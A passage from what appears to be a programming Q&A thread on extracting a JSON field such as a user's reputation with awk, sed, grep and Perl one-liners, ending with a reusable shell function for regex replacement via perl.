gsub(/[:\",]/,"",a[1]) # now, get rid of the redundant characters
print a[1]
}' 165297.json
output:
$ ./shell.sh
2747
sed is a perfectly valid command for your task, but it may not be the only one.
grep may be useful too, but as you say it prints the whole line. It's most useful for filtering the lines of a multi-line file, and discarding the lines you don't want.
Efficient shell scripts can use a combination of commands (not just the two you mentioned), exploiting the talents of each.
Blindly:
echo $json | awk -F\" '{print $8}'
Similar (the field separator can be a regex):
awk -F'{"|":"|","|"}' '{print $5}'
Smarter (look for the key and print its value):
awk -F'{"|":"|","|"}' '{for(i=2; i<=NF; i+=2) if ($i == "reputation") print $(i+1)}'
You can use a proper library (as others noted):
E:\Home> perl -MLWP::Simple -MJSON -e "print from_json(get 'http://stackoverflow.com/users/flair/165297.json')->{reputation}"
or
$ perl -MLWP::Simple -MJSON -e 'print from_json(get "http://stackoverflow.com/users/flair/165297.json")->{reputation}, "\n"'
depending on OS/shell combination.
Simple RegEx via Shell
Disregarding the specific code in question, there may be times when you want to do a quick regex replace-all from stdin to stdout using shell, in a simple way, using a string syntax similar to JavaScript.
Below are some examples for anyone looking for a way to do this. Perl is a better bet on Mac since it lacks some sed options. If you want to get stdin as a variable you can use MY_VAR=$(cat);.
echo 'text' | perl -pe 's/search/replace/g'; # using perl
echo 'text' | sed -e 's/search/replace/g'; # using sed
And here's an example of a custom, reusable regex function. Arguments are source string (or -- for stdin), search, replace, and options.
regex() {
case "$#" in
( '0' ) return 1 ;; ( '1' ) echo "$1"; return 0 ;;
( '2' ) REP=''; OPT='' ;; ( '3' ) REP="$3"; OPT='' ;;
( * ) REP="$3"; OPT="$4" ;;
esac
TXT="$1"; SRCH="$2";
if [ "$1" = "--" ]; then [ ! -t 0 ] && TXT=$(cat); fi
echo "$TXT" | perl -pe 's/'"$SRCH"'/'"$REP"'/'"$OPT";
}
echo 'text' | regex -- search replace g;